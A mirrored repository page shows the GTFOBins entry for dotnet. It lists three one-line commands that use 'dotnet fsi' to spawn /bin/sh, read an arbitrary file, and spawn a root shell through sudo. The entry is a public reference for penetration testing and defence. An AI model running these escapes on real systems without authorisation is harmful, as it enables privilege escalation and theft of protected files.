This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-29 11:41:40 +01:00
Code
Issues
90960c8ea4
GTFOBins.github.io
/
_gtfobins
/
dotnet.md
pad0van
f9e3d84596
Add dotnet
...
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2023-02-23 21:53:30 +01:00
412 B
Raw
Blame
History
functions
shell
file-read
sudo
code
dotnet fsi System.Diagnostics.Process.Start("/bin/sh").WaitForExit();;
code
export LFILE=file_to_read dotnet fsi System.IO.File.ReadAllText(System.Environment.GetEnvironmentVariable("LFILE"));;
code
sudo dotnet fsi System.Diagnostics.Process.Start("/bin/sh").WaitForExit();;